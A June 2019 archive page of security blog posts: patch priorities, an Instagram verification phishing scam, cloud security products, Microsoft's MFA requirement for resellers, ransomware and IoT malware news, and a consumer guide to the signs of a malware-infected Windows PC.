Monthly Archives: June 2019

Tripwire Patch Priority Index for June 2019

Tripwire’s June 2019 Patch Priority Index (PPI) brings together important vulnerabilities from Microsoft, Oracle, and Adobe. First and most importantly this month are patches available to resolve 2 deserialization vulnerabilities in Oracle WebLogic. These vulnerabilities are identified as CVE-2019-2725 and CVE-2019-2729. Both of these vulnerabilities allow remote code execution over a network and without authentication. […]… Read More

The post Tripwire Patch Priority Index for June 2019 appeared first on The State of Security.

How to Avoid Common Software Vulnerability Management Mistakes

Vulnerability management (VM) is an essential process through which organizations can reduce risk in their environments. But myths and misconceptions surrounding VM abound. For instance, organizations commonly approach vulnerability management in the same way as they do patch management. Others are guilty of believing that all attacks rely on vulnerabilities, while others still are under […]… Read More

The post How to Avoid Common Software Vulnerability Management Mistakes appeared first on The State of Security.

#Verified or Phishing Victim? 3 Tips to Protect Your Instagram Account

If you’re an avid Instagram user, chances are you’ve come across some accounts with a little blue checkmark next to the username. This little blue tick is Instagram’s indication that the account is verified. While it may seem insignificant at first glance, this badge actually means that Instagram has confirmed that the account is an authentic page of a public figure, celebrity, or global brand. In today’s world of social media influencers, receiving a verified badge is desirable so other users know you’re a significant figure on the platform. However, cybercriminals are taking advantage of the appeal of being Instagram verified as a way to convince users to hand over their credentials.

So, how do cybercriminals carry out this scheme? According to security researcher Luke Leal, this scam was distributed as a phishing page through Instagram. The page resembled a legitimate Instagram submission page, prompting victims to apply for verification. After clicking on the “Apply Now” button, victims were taken to a series of phishing forms with the domain “Instagramforbusiness[.]info.” These forms asked users for their Instagram logins as well as confirmation of their email and password credentials. However, if the victim submitted the form, their Instagram credentials would make their way into the cybercriminal’s email inbox. With this information, the cybercrooks would have unauthorized access to the victim’s social media page. What’s more, since this particular phishing scam targets a user’s associated email login, hackers would have the capability of resetting and verifying ownership of the victim’s account.

Whether you’re in search of an Instagram verification badge or not, it’s important to be mindful of your cybersecurity. And with Social Media Day right around the corner, check out these tips to keep your online profiles protected from phishing and other cyberattacks:

  • Exercise caution when inspecting links. If you examine the link used for this scam (Instagramforbusiness[.]info), you can see that it is not actually affiliated with Instagram.com. Additionally, it doesn’t use the secure HTTPS protocol, indicating that it is a risky link. Always inspect a URL before you click on it. And if you can’t tell whether a link is malicious or not, it’s best to avoid interacting with it altogether.
  • Don’t fall for phony pages. If you or a family member is in search of a verified badge for their Instagram profile, make sure they are familiar with the process. Instagram users should go into their own account settings and click on “Request on verification” if they are looking to become verified. Note that Instagram will not ask for your email or password during this process, but will send you a verification link via email instead.
  • Reset your password. If you suspect that a hacker is attempting to gain control of your account, play it safe by resetting your password.

And, as usual, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post #Verified or Phishing Victim? 3 Tips to Protect Your Instagram Account appeared first on McAfee Blogs.

Using Amazon Web Services? Cisco Stealthwatch Cloud has all your security needs covered

Like many consumers of public cloud infrastructure services, organizations that run workloads in Amazon Web Services (AWS) face an array of security challenges that span from traditional threat vectors to the exploitation of more abstract workloads and entry points into the infrastructure.

This week at AWS re:Inforce, a new feature for AWS workload visibility was announced – AWS Virtual Private Cloud (VPC) Traffic Mirroring.  This feature allows for a full 1:1 packet capture of the traffic flowing within and in/out of a customer’s VPC environment.  This allows for vendors to provide visibility into the entire AWS traffic, and the ability to perform network and security analytics.  Cisco Steathwatch Cloud is able to fully leverage VPC Traffic Mirroring for transactional network conversation visibility, threat detection and compliance risk alerting.

Stealthwatch Cloud is actually unique in that we have had this level of traffic visibility and security analytics deep within an AWS infrastructure for a number of years now with our ability to ingest AWS VPC Flow Logs. VPC Flow Logs allow for a parallel level of visibility in AWS without having to deploy any sensors or collectors. This method of infrastructure visibility allows for incredibly easy deployment within many AWS VPCs and accounts at scale in a quick-to-operationalize manner with Stealthwatch Cloud’s SaaS visibility and threat detection solution. In fact, you can deploy Stealthwatch Cloud within your AWS environment in as little as 10 minutes!

Additionally, we are seeing that the majority of customer traffic in, out and within a VPC is encrypted. Stealthwatch Cloud is designed from the ground up to assume that the traffic is encrypted and to model every entity and look for threats leveraging a multitude of data points regardless of payload.

Stealthwatch Cloud takes the AWS visibility and protection capability even deeper by leveraging the AWS API to retrieve a wide array of telemetry from the AWS backend to tell a richer story of what’s actually going on throughout the AWS environment, far beyond just monitoring the network traffic itself. We illuminate API keys, user accounts, CloudTrail audit log events, instance tags, abstract services such as Redshift, RDS, Inspector, ELBs, Lambdas, S3 buckets, Nat Gateways and many other services many of our customers are using beyond just VPCs and EC2 instances.

Here is a screenshot from the customer portal with just a sample of the additional value Stealthwatch Cloud offers AWS customers in addition to our network traffic analytics:

The following screenshot shows how we are able to extend our behavioral anomaly detection and modeling far beyond just EC2 instances and are able to learn “known good” for API keys, user accounts and other entry points into the environment that customers need to be concerned about:

Combine this unique set of rich AWS backend telemetry with the traffic analytics that we can perform with either VPC Flow Logs or VPC Traffic Mirroring, and we are able to ensure that customers are protected regardless of where the threat vector into their AWS deployment may exist – at the VPC ingress/egress, at the AWS web login screen or leveraging API keys.  Cisco is well aware that our customers are using a broad set of services in AWS that stretch from virtual machines to serverless and Kubernetes.  Stealthwatch Cloud is able to provide the visibility, accountability and threat detection across the Kill Chain in any of these environments today.

Try today!

Interested in Cisco Stealthwatch Cloud? You can try it today with our no-risk, 60-day free trial. To sign up, click here or visit us on the AWS Marketplace.

 

 

Microsoft to Require Multi-Factor Authentication for Cloud Solution Providers

It might be difficult to fathom how this isn’t already mandatory, but Microsoft Corp. says it will soon force all Cloud Solution Providers (CSPs) that help companies manage their Office365 accounts to use multi-factor authentication. The move comes amid a noticeable uptick in phishing and malware attacks targeting CSP employees and contractors.

When an organization buys Office365 licenses from a reseller partner, the partner is granted administrative privileges in order to help the organization set up the tenant and establish the initial administrator account. Microsoft says customers can remove that administrative access if they don’t want or need the partner to have access after the initial setup.

But many companies partner with a CSP simply to gain more favorable pricing on software licenses — not necessarily to have someone help manage their Azure/O365 systems. And those entities are more likely to be unaware that just by virtue of that partnership they are giving someone at their CSP (or perhaps even outside contractors working for the CSP) full access to all of their organization’s email and files stored in the cloud.

This is exactly what happened with a company whose email systems were rifled through by intruders who broke into PCM Inc., the world’s sixth-largest CSP. The firm had partnered with PCM because doing so was far cheaper than simply purchasing licenses directly from Microsoft, but its security team was unaware that a PCM employee or contractor maintained full access to all of their employees’email and documents in Office365.

As it happened, the PCM employee was not using multi-factor authentication. And when that PCM employee’s account got hacked, so too did many other PCM customers.

KrebsOnSecurity pinged Microsoft this week to inquire whether there was anything the company could be doing to better explain this risk to customers and CSP partners. In response, Microsoft said while its guidance has always been for partners to enable and require multi-factor authentication for all administrators or agent users in the partner tenants, it would soon be making it mandatory.

“To help safeguard customers and partners, we are introducing new mandatory security requirements for the partners participating in the Cloud Solution Provider (CSP) program, Control Panel Vendors, and Advisor partners,” Microsoft said in a statement provided to KrebsOnSecurity.

“This includes enforcing multi-factor authentication for all users in the partner tenants and adopting secure application model for their API integration with Microsoft,” the statement continues. “We have notified partners of these changes and enforcement will roll out over the next several months.”

Microsoft said customers can check or remove a partner’s delegated administration privileges from their tenants at any time, and that guidance on how do do this is available here and here.

This is a welcome — if long overdue — change. Countless data breaches are tied to weak or default settings. Whether we’re talking about unnecessary software features turned on, hard-coded passwords, or key security settings that are optional, defaults matter tremendously because far too many people never change them — or they simply aren’t aware that they exist.

Cyber News Rundown: Second Florida Ransomware Attack

Reading Time: ~ 2 min.

Second Florida City Pays Ransom

Following the news that Riviera Beach, FL would pay the ransom demanded by cyberattackers, the mayor of Lake City, FL has announced that the city will be paying the demanded ransom of $460,000 to restore access to their email and internal system servers. While law enforcement agencies strongly recommend against paying the ransom and suggest that victims instead attempt to recover encrypted files through backups or other offline methods, many companies who fall prey to ransomware attacks do not keep complete backups of their systems, so they may have no choice but to pay.

Group Arrested in Domain Spoofing Scam

Several individuals were recently arrested for creating a spoof domain for Blockchain.com, a site that allows users to access their cryptocurrency wallets. The individuals in question successfully stole over $27 million’ worth of various currencies from roughly 4,000 victims by using their spoofed site to steal wallet credentials. The group was captured in two separate countries after more than a year of investigation.

Database for Insurance Marketing Site Exposed

A database belonging to MedicareSupplement.com, an insurance marketing site, was found to be publicly accessible, exposing the records of over 5 million customers. While it is unclear how long the database had been improperly secured, the researcher who discovered it in mid-May promptly reported it to the database owner. Amongst data exposed were nearly a quarter million records that indicated specific insurance categories.

Report Reveals Countries Most Targeted by Ransomware

A new report has run the numbers to uncover the top five countries most targeted by ransomware. So far in 2019, the list includes the USA, Brazil, India, Vietnam, and Turkey. During the first quarter of this year alone, the USA took 11% of the attacks, with Brazil coming in right behind with 10% of the total number of attacks. Even more concerning: the average ransom demand has nearly doubled since this time last year, jumping from around $6,700 to ca. $12,700.

IoT Malware Bricks Devices

Researchers have just found a new type of malware, dubbed Silex, that focuses on IoT devices running with default credentials. The malware then bricks—i.e., breaks in an irreparable or unrecoverable fashion—the entire device. The Silex authors claim to have distributed it with the specific intention of rendering devices unusable to prevent lower level scripters from adding the devices to their botnets. Fortunately, the authors did shut down the malware’s command servers, though the already-distributed samples will continue their operations until they have been removed by security.

The post Cyber News Rundown: Second Florida Ransomware Attack appeared first on Webroot Blog.

Is Cloud Service Provider-Native Security ‘Good Enough’ For Your Cloud Transformation Program’s Goals?

Several times lately, CIOs and CISOs have asked me why the security toolset they get for “free” from their cloud service providers isn’t enough. Sure, it might not be the best … but isn’t it good enough for the program’s success?

It’s true that we don’t often need the Cadillac. But cloud programs are failing at high rates, and the number-one listed reason is security challenges. Teams are trying to use that SaaS or IaaS/PaaS cloud service provider-native security and finding after initial designs that it’s full of holes, or that it’s very difficult to operate across the enterprise. And trying to bolt on additional security to highly automated cloud deployments is not nearly as easy as it was in steadier-state traditional data center configurations. We as solution engineers are failing our development, business and security teams by not addressing the number-one factor in cloud transformation failure with tools that will better support their success in delivering secure cloud implementations.

Figure 1: Percent of respondents with major cloud programs reporting they have “fully achieved” their expected cloud outcomes

Figure 2:  Top concerns perceived to impact that lack of full program goal attainment

The CSPs and enterprise software providers just aren’t considering full architectural requirements for security, at a time when architecture overall—and security architecture in particular—is more important than ever. And they don’t have that perspective: Operating a complete end-to-end security architecture and program isn’t the perspective of these software companies’ product teams. Enterprise security is still needed, but new perspectives, more flexibility and support for automated architectures are also needed. Cloud deployments move so fast that we get to the point of “hard to add budget and redesign for efficiency” faster than ever before. We’re asking our development teams to walk a high wire, creating new technologies that enable business using new cloud technologies … but we’re assuming that those new cloud technologies are coming with their own security safety nets. And the market experience is that they don’t.

A better approach is to ENSURE a practical, agile security architecture starting with Cloud Access Security Broker (CASB) basics in place as a foundation of any major cloud transformation program. This gives us detective—and quickly available preventative—controls to ensure that while valuable risks are taken by our development and business teams who build fast in SaaS or IaaS/PaaS cloud, we are protecting them and the enterprise from egregious configuration errors and other easy mistakes up on that high wire.

When I’m developing services, I want to work with market-proven tools—they create an environment for my success.  

What do you think? Are SaaS or IaaS/PaaS “built-in” security controls sufficient, or is a considered enterprise security architecture still necessary? Should we design that security architecture as base to programs or after giving CSPs’ own controls a chance to fail? Always interested in your feedback.

Next month, we’ll look at the highest-priority components of a complete cloud security architecture.

The post Is Cloud Service Provider-Native Security ‘Good Enough’ For Your Cloud Transformation Program’s Goals? appeared first on McAfee Blogs.

Business-Focused Approach to Security Assurance Is More Evolution Than Revolution

Veracode Information Security Forum Security Assurance Research

According to a new research report from Information Security Forum (ISF), only 32 percent of its membership is satisfied with their security assurance program – though 80 percent say that they want to take a more business-focused approach to security. Given the ever-evolving threat landscape, security leaders understand that they always need their finger on the pulse of how secure their organization’s information is. This can prove to be challenging if the right processes and controls are not in place across development, IT, and security in your organization.

Often times, communicating the security of your organization –and communicating it well – comes down to asking the right people the right questions, and taking smaller steps to achieve the desired outcome. In the report, Establishing a Business-Focused Security Assurance Program, ISF proposes that organizations build on existing compliance-based approaches instead of recreating the wheel. To map out where the program needs to go and begin evolving it with business in mind, IFS notes that security leaders should:

  • Identify what business stakeholders want from security assurance
  • Break down the requirements into manageable tasks to move from current to future approaches
  • Apply repeatable security assurance process across multiple target environments (i.e. business processes, projects and supporting assets where appropriate in your organization)

“Taking a business-focused approach to security assurance is an evolution. It means going a step further and demonstrating how well business processes, projects and supporting assets are really protected, by focusing on how effective controls are,” said Steve Durbin, Managing Director, ISF. “A business-focused approach requires a broader view, considering the needs of multiple stakeholders within the organization: what do they need to know, when and why? Answering these questions will enable adoption of testing, measurement and reporting techniques that provide appropriate evidence.”

Including Secure Coding in the Security Control Discussion

According to the 2019 Verizon Data Breach Investigations Report, 62 percent of breaches and 39 percent of incidents occur at the web application layer. While it is unclear exactly how the web applications were compromised in some cases, it’s assumed that attackers are scanning for specific web app vulnerabilities, exploiting them to gain access, inserting some kind of malware, and harvesting personal data to create a profit.

An often-overlooked way to tighten security in your organization is to provide developers with the tools they need to code securely, and to continue learning about different vulnerabilities as they work. When development teams are able to scan for vulnerabilities in their code while they work, they’re less likely to be introduced in the QA and production stages. The State of Software Security Report Volume 9 shows that organizations that are conducting application security scanning more than 300 times per year are able to shorten flaw persistence by 11.5 percent.

This means that development leaders must be included in security control discussions. Their team may work in a different way than others across your organization, so understanding how to support them to make security a seamless priority in their day-to-day processes is a necessary step for security assurance. Once the DevSecOps approach to application development has been adopted, it’s even easier to verify for your executives – as well as customers and prospects – that you really do take security seriously.

The Right Analytics to Tell the Right Story

Analytics are useful for determining exactly what the right metrics are for AppSec managers to share with executives and their board. Given that policy compliance is often the number one priority for this audience, AppSec managers need to set their threshold for what they’re willing to accept and what they’re unwilling to accept when it comes to the appropriate level of risk and the type of data involved.

The Veracode Platform includes Veracode Analytics, which empowers our customers to set up custom analytics once they’ve determined their risk threshold and application criticality. With an easy-to-use dashboard view, AppSec managers can review their AppSec program to make sure that development and security teams alike are scanning all of their applications – and fixing what they find.

The Veracode Platform and Veracode Analytics can be a game-changer for your business, as it helps you to stay focused, motivate your teams, ensure better resource allocation, and help you more strategically communicate your security posture to the executive team.

For more on getting executive support for application security, see Everything You Need to Know About Getting AppSec Buy-In.

For more on measuring your application security program, see Everything You Need to Know About Measuring Your AppSec Program.

This Week in Security News: Malvertising and Internet of Things Malware

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about a new Internet of Things malware that’s bricked thousands of devices. Also, read about a ransomware family that’s using malvertising to direct victims to a RIG exploit kit.

Read on:

 

Shadowgate Returns to Worldwide Operations with Evolved Greenflash Sundown Exploit Kit

After almost two years of sporadic restricted activity, the ShadowGate campaign has started delivering cryptocurrency miners with a newly upgraded version of the Greenflash Sundown exploit kit, which has been spotted targeting global victims after primarily operating in Asia. 

Silex Malware Bricks IoT Devices with Weak Passwords

A new Internet of Things malware called Silex only operated for about a day, though it has already managed to quickly spread and wipe devices’ firmware, bricking thousands of IoT devices. 

Top Takeaways from AWS Security Chief Stephen Schmidt at re:Inforce 2019

Steven Schmidt’s keynote address at AWS re:Inforce touched on the current state of cloud security, building a security culture, tactical security tips and a road map of where the industry and technology are headed. 

AWS re:Inforce Warm-Up Episode

Mark Nunnikhoven gives key predictions and insights into trends at AWS re:Inforce, security in the top three major public cloud providers and the evolution of the cloud industry as a whole. 

Dell Urges Millions of Users to Patch Vulnerability in SupportAssist Tool

Dell released a security advisory that implored customers to update the vulnerable SupportAssist application in both business and home machines. The privilege escalation vulnerability can give hackers access to sensitive information and control over millions of Dell computers running Windows.

HTTPS Protocol Now Used in 58% of Phishing Websites

According to the Q1 2019 report from the Anti-Phishing Working Group (APWG), the Hypertext Transfer Protocol Secure (HTTPS) protocol tactic has been on the rise in phishing attacks, now used in 58% of phishing websites.  

Federal Cybersecurity Defenses are Critical Failures, Senate Report Warns

A 10-month review of 10 years of inspector general reports revealed that several Federal agencies responsible for safeguarding millions of Americans’ security, public safety and personal data have failed to apply even basic defenses to cyberattacks.

Kubernetes Vulnerability CVE-2019-11246 Discovered Due to Incomplete Updates from a Previous Flaw

Kubernetes announced the discovery of a high-severity vulnerability that, if exploited, could lead to a directory traversal that allows an attacker to use a malicious container to create or replace files in a user’s workstation. 

The IIoT Attack Surface: Threats and Security Solutions

Many manufacturing factories and energy plants have hundreds of IIoT devices that help streamline operations, but those facilities now also have to defend against new threats that take advantage of attack vectors and weaknesses in the technology. 

Facebook’s Bid to Quash Data Breach Lawsuit Dismissed by Judge

Facebook has failed in its attempt to prevent a lawsuit over a data breach impacting close to 30 million users from going to trial. A federal appeals court in San Francisco rejected the social media giant’s request to dismiss the court case out of hand.

Sodinokibi Ransomware Group Adds Malvertising as Delivery Technique

Attackers behind a ransomware family called Sodinokibi have used a variety of delivery vectors since April: malicious spam, vulnerable servers, managed server providers (MSPs) and now malvertising. The malicious advertisements were on the PopCash ad network, and certain conditions would redirect users to the RIG exploit kit. 

CVE-2019-8635: Double Free Vulnerability in Apple macOS Lets Attackers Escalate System Privileges and Execute Arbitrary Code

Trend Micro discovered and disclosed a double free vulnerability in macOS that, if successfully exploited, can allow an attacker to implement privilege escalation and execute malicious code on the system with root privileges.

Using Whitelisting to Remediate an RCE Vulnerability (CVE-2019-2729) in Oracle WebLogic

Trend Micro took a closer look at Oracle’s recent vulnerability CVE-2019-2729 to see how this class of vulnerability has been remediated — particularly via blacklisting or whitelisting — and why it has become a recurring security issue.

95,000 Delawareans Impacted in Data Breach that Lasted Nearly Nine Years

The personal data of roughly 95,000 Delawareans may have been compromised in a nine-year security breach at Dominion National, a large vision and dental insurer, according to Delaware’s Department of Insurance.

Do you feel that the IoT devices in your home are well-protected against cyberattacks? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay. 

The post This Week in Security News: Malvertising and Internet of Things Malware appeared first on .

13+ Warning Signs that Your Computer is Malware-Infected [Updated 2019]

Here’s one of the scenarios you may not like, but which sadly, could happen to you any day. You’re working on an important project and suddenly, you start seeing annoying pop-ups showing up on your computer. More than that, it takes too long for your files or apps to load. You keep waiting until you start asking yourself: “Is my computer infected with malware?”

Unfortunately, the answer might be “yes” and your PC could be already compromised with viruses or next-gen malware that are slowing down its performance.

This is one of the many warning signs that show your PC might suffer from malware infection. But there is so much more you need to be aware of and understand, so you can quickly take action.

In this article, we’ll show you the most frequent warning signs of malware infection on computers running Microsoft Windows and what can you do about it.

Use these quick links to easily navigate and see some of the most common warning signs displayed on a computer:

  1. Your computer is slowing down
  2. Annoying ads are displayed
  3. Crashes
  4. Pop-up messages
  5. Internet traffic suspiciously increases
  6. Your browser homepage changed without your input
  7. Unusual messages show unexpectedly
  8. Your security solution is disabled
  9. Your friends say they receive strange messages from you
  10. Unfamiliar icons are displayed on your desktop
  11. Unusual error messages
  12. You can’t access the Control Panel
  13. Everything seems to work perfectly on your PC
  14. You get the error on the browser
  15. You get suspicious shortcut files

Scenario #1: “My computer applications run slowly and they take longer than usual to start.”

If you’re dealing with this scenario, it could mean you have viruses on your computer.

I know, it’s so frustrating to see it working slowly.

It’s a known fact that one of the malware’s main activity is to slow down your operating system, no matter if you’re browsing the Internet or simply accessing your local applications.

What can you do?

First, you need to investigate the causes and try to understand what is going on.

Here are some of the most common issues that slow down your PC:

1. Your system’s RAM memory is low.

This might be caused by the high number of apps you’re currently using.

Windows Task Manager will help you see which programs use the most of your RAM memory.

Press CTRL+ALT+DELETE simultaneously, choose Task Manager and a list of the current apps you have open will be shown.

2. There is no storage space on your hard disk.

In this case, you need to check all your files stored and do a clean-up.

3. Your browser may be using too many computer resources.

You can see how your browser is performing in Windows Task Manager.

What can you do about your browser’s speed?

Remove unnecessary browser add-ons. Here is a list of Chrome extensions to increase your online safety – just make sure you pick out what you really need and don’t use all of our suggestions simultaneously. Or if you don’t feel like saying goodbye to your favorite extensions, just disable them so they don’t run on each webpage.

Delete excess cache. If you’re carrying along tons of cache and browsing history, this may be the reason your browser is so slow.

Close unnecessary tabs as you open new ones. Oh, the tabs clutter, we’ve all been there. I know, you may be tricked into thinking you may actually need to go back and revisit every tab you’ve opened in a browsing session. But let’s be honest, you most probably won’t need to do it. Just keep in mind you can always reopen your recent browsing history / recently closed tabs – well unless you’re browsing in Incognito/Private mode, but that’s a different story.

4. Your system may be fragmented.

Over time, files kept on a hard drive become fragmented. In simple terms, this means that parts of these files get stored in different areas of the drive and not next to each other. Thus, the storage space is used inefficiently and reduces your PC’s performance, making it harder for your operating system to open a file.

You can fix this by using the Windows disk defragmenter (Optimize Drives).

In Windows 10, Windows 8, and Windows 7, the defragmenter tool runs automatically, so you most probably don’t need to worry about this.

5. Your Windows OS hasn’t been updated or you’re using outdated drivers.

Always make sure your OS is constantly updated. Unpatched systems can have vulnerabilities that can be exploited by malevolent actors, so make sure you’re always running the latest version of Windows.

If you have already thoroughly verified these possible causes and everything seems to work just fine, you can start considering a potential malware infection.

Scenario #2: “I keep getting annoying ads that are opening randomly or strange messages on my computer’s screen.”

Unexpected pop-ups which appear on your screen are a typical sign of a malware infection that wreaks havoc on your computer.

This form of malware is known as spyware and is designed to collect and steal users’ sensitive data without their knowledge.

In this particular case, the main issue is not only the numerous pop-up windows that affect your Internet browsing. It’s also quite difficult to remove them from your system.

These pop-ups are not only frustrating, but they usually come bundled with other concealed malware threats and can be far more destructive for your OS.

They could be disguised as legitimate programs and actually track your web browsing data or monitor your online activity to collect passwords and other personal information.

We strongly recommend to NEVER CLICK on a suspicious pop-up!

To keep your computer away from malicious threats, make sure you apply these security measures:

  1. Do not click on pop-up windows.
  2. Do not answer unsolicited emails that look strange. Always verify the sender’s email address and never open attachments or click weird links.
  3. Be very careful when you are trying to download free applications.
  4. Use a next-gen threat prevention solution that identifies online dangers and blocks them before they actually get the chance to infect your PC.

Scenario #3: “My laptop keeps crashing when I watch Youtube videos or play games. It simply freezes, then a blue screen shows up.”

So, you got the popular BSOD (Blue Screen of Death). Then it recovered and “told” you Windows was recovering from an unexpected shutdown.

There might be two things causing this type of issue:

  1. You could be dealing with a technical issue caused by a potential incompatibility between your software and/or hardware.
  2. It may be a malware issue.

If you suspect any technical problem, it could be caused by these issues:

Are different programs running on your PC that are in conflict?

Are there any orphaned registry keys which have not been removed that could eventually crash your system?

Orphaned registry keys are pieces of data that have been left behind during the process of uninstalling several programs from your computer. They don’t only take up unnecessary space on your PC but can cause a serious issue for its proper functionality.

How to fix this:

  • Use the Registry Editor (Regedit.exe)that can be opened in the search bar of Windows. From there, you select the run command.
  • For malware infections:

Run a complete scan on the system with a good antivirus product. And make sure you’ll never get infected with malware by using a complete and all-in-one security suite, that catches threats before they happen.

Scenario #4: “I started getting this popup message <You’re running out of disk space on Windows (C:)>”

If you are receiving this warning message, it means there’s no free space left on a particular partition (in this case, C) on the main hard drive on your computer. More and more users are reporting this issue.

The cause? Here’s what Microsoft has to say about this:

This behavior can occur if the free disk space on your computer has dropped below the low disk space notification threshold associated with the Disk Cleanup utility.

How do I fix this?

First of all, you need to check if your physical storage space has been increasing lately or if some of your files disappeared or changed their names.

Second, make sure you delete all those old or unnecessary files that can lower your PC’s performance.

Third, this could be another sign of malware infection. There are so many types of malicious programs which use different methods to fill up all the available space in the hard drive and cause it to crash. For this, make sure you’re using an anti-malware solution that automatically performs scans and doesn’t let any viruses or threats reach your system.

Scenario #5: “For quite some time, every time I start my PC, I notice that the Internet traffic suspiciously increases.”

Chances are there is an unusually high network activity happening on your PC that could be the cause of a malware infection.

What can I do?

Check each of these items:

  • The last Windows update for your computer
  • Is there any program or application that’s downloading any data?
  • Is there any update for a certain app running at this moment?
  • Is there a large download that you started and forgot about, which may still be running in the background?

If the answer to all these questions is NO and you can’t find a cause for your increased Internet traffic, then this may be a sign of malware infection. In this case, you should use a specialized security suite designed to address advanced and new online threats.

Scenario #6: “My homepage has changed and I don’t remember doing it myself.”

If you spotted this unusual behavior or a new toolbar is showing out of nowhere, or you’ve been redirected to a different web address different from the one you’ve initially accessed, these could be signs of malware infection.

It usually happens when you visit a website and you accidentally click on a link or a pop-up window.

This triggers the unwanted software to download and install on your device. The effects are not only annoying but also malicious and can compromise your data.

What to do?

You can always manually change your homepage address from your browser’s settings.

But the actual cause of this behavior can be, unfortunately, rooted much deeper, and be a sign of a more serious malware infection.

So, the best way to avoid compromising your files, passwords, and payment details is by using a complete, next-gen threat prevention and mitigation security solution.


I just learned to easily detect malware infection on my PC.
Click To Tweet


Scenario #7: “My PC is acting weird because I get unusual messages that appear unexpectedly.”

That’s usually the type of warning message that makes you wonder “What’s going on with my computer?”

Here are some frequent warning signs to watch out for:

  • Suddenly, you see programs opening and closing automatically.
  • Your Windows OS is shutting down unexpectedly, without any reason.
  • You’ve noticed strange windows showing up when your PC tries to boot.
  • Windows tells you that you’ve lost access to some of your drives.

Although the root cause may be a technical issue, it could also be a warning sign that malware has taken over your computer and is slowing down its activity.

How to mitigate the impact of a malware infection?

Follow these steps:

  1. Keep your Windows system up to date.
  2. Use an anti-malware solution that’s doesn’t give threats the chance to enter your computer.
  3. Consider reinstalling your operating system. This 13-step guide will show you how to secure your PC after a fresh (re)installation.

Scenario #8: “I use an antivirus product and keep getting the message that <Protection is disabled>.”

If you noticed your antivirus solution doesn’t seem to work anymore or the Update module is disabled, then you should check out immediately for ways to fix this.

Did you know that some types of malware are sneaky and can disable your security solution?

Well, yes, they are designed to leave users without any defense and make it difficult to detect them.

If you already tried to reboot your computer, closed and opened the security solution and all your troubleshooting efforts seemed useless, you could take into consideration the malware infection scenario.

This is especially the case because it’s a known fact that traditional antivirus solutions can’t easily detect, block or remove next-gen and advanced malware (such as ransomware, adware or financial malware).

Thus, you can get exposed to all kind of attacks, and we strongly recommend enhancing your protection by adding multiple layers of protection.

Read these 10 reasons why second-generation malware evades antivirus detection.

Scenario #9: “My friends tell me they’re getting strange random messages from me on Facebook, which I didn’t send.”

If your friends recently got several strange messages/emails or suspicious links from you, and you didn’t send them, it’s likely that you’ve been infected with malware.

Here’s a good example of malware spreading via Facebook Messenger and tricking users into clicking on links they’ve received from one of their friends.

But first, check out your online accounts and see if those random messages were actually sent from one of your accounts. If something like this happened, take immediate action by following these security measures:

  • Log out from all your accounts. For most of our online accounts, we log into multiple devices and we often forget to log out. So make sure to log out from your online accounts on all connected devices.
  • Use unique and strong passwords for all your online accounts. Always remember to change passwords! NEVER use the same password(s) for multiple accounts, because if you are hacked, all of them will be exposed and your valuable data will get stolen. This password security guide will help you master passwords like an expert.
  • Start using two-factor authentication RIGHT NOW. Do you want to increase your control over your accounts’ security? Then add this second security layer that will ask for an extra authentication step in the login process, along with your credentials.

Scenario #10: “There are these new, yet unfamiliar icons on my desktop that I don’t recognize.”

If you’ve been noticing unknown and new icons on your PC, you most likely downloaded by accident these sneaky programs called PUPs (Potentially Unwanted Programs). They are malicious programs that can do a lot of damage and expose you to data leakage, displaying annoying ads or pop-ups on the screen, or adding toolbars on your browser.

They often come together with suspicious software you’ve ended up installing. You may have accidentally given your consent to install additional tools which you didn’t notice were there.

But while good Internet practices can protect you against PUPs, it’s advisable to rely on proactive security software.

Scenario #11: “Sometimes, I see unusual error messages displayed on my computer.”

An error message like this one could indicate that there’s a bug in your system which needs to be fixed. Or it could be a warning sign of malware infection.

These types of error messages showing missing or corrupt file folders suggest that your PC has been compromised and its performance is affected.

Source: Microsoft Windows Dev Center

How to fix this:

  • Make sure you have the latest updates installed on your operating system and regularly check for security patches, applications patches, and drivers.
  • Use a next-gen anti-malware solution, designed to keep you safe from any unwanted threats.

Scenario #12: “It seems that I can’t access my Control Panel by clicking on the button.”

If you are facing this issue and your Control Panel does not open, it means that your computer is having a technical problem and is not functioning correctly.

How to fix this?

  • The first thing to do is to run a full scan of your PC.
  • Then, see if you can open the Control Panel in Safe Mode and follow these steps described here. It could also be another sign that your computer is vulnerable and exposed to potential cyber attacks. After running a full scan with your antivirus product, use also a proactive security solution to keep your confidential information safe.

Scenario #13: “Everything seems to work perfectly on my PC. Are any chances to be paranoid and still check out for malware?”

When it comes to data protection, it is essential to be a little bit paranoid and very careful, even if everything seems to look normal. Why? Because cybercriminals are creative and they can hide malware in the most unexpected places, leaving no visible marks and still infecting your computer.

Everything may seem to work perfectly normal on your PC until a boot on your system could silently wait for instructions to access and collect your most valuable data.

The best way to make sure you don’t have any malware taking over your system by installing a security solution that scans your machine in real time and stops threats before they touch your PC.

Scenario #14: “My laptop is working very slowly and sometimes it gives the <Flash not working> error in the browser.”

We received the above message from one of our readers.

If you get this message too on your PC, it might be a good idea to disable Flash and try another alternative. Flash has lots of vulnerabilities that we talked about before.

Regardless of the browser you are using, Firefox this could be a warning sign that your computer is malware-infected.

Here are a few useful tips that will come in handy: 

  • Keep your Windows system up to date and consider reinstalling your OS if this issue persists.
  • Do a full scan of all your files and apps installed on your PC using an AV solution, to see if it detects any malware.
  • Consider installing a proactive security solution to enhance protection for your computer and keep malware and other online threats at bay.
  • Also, make sure you reboot your PC if you haven’t performed this task in a while.
  • Have a look at the Task Manager function and see what programs run in the background that could slow down your PC performance. It helps you get an overview of what apps and program take space and how much.
  • Make sure you have the latest version of Adobe Flash installed, but if you don’t have it, download it from here and follow the instructions. Remember to restart the computer after this procedure.
  • If you no longer want to have Flash Player on your computer, you can follow these easy steps and uninstall it.

Scenario #15: “I used an external USB drive and when I connected it to my computer, it was infected by a virus and suddenly all the files turned into shortcuts.”  

Here’s another warning sign showing your computer could be infected with malware. If you used an external USB drive or another external flash drive to copy information without scanning it before, this could explain the appearance of those shortcut files.

If all your images, files, and other documents show up as shortcut files and are not accessible, they could be infected with malware. These malicious files can compromise all your data from the computer, rename your files and create a lot of chaos and hassle.

How to fix this? 

If your files have been compromised, here are some useful tips and security measures to take:

  • Do a full scan of your USB drive and check out for possible viruses and malware. If the antivirus solution doesn’t detect them on your external drive, you should format it and clean the space.
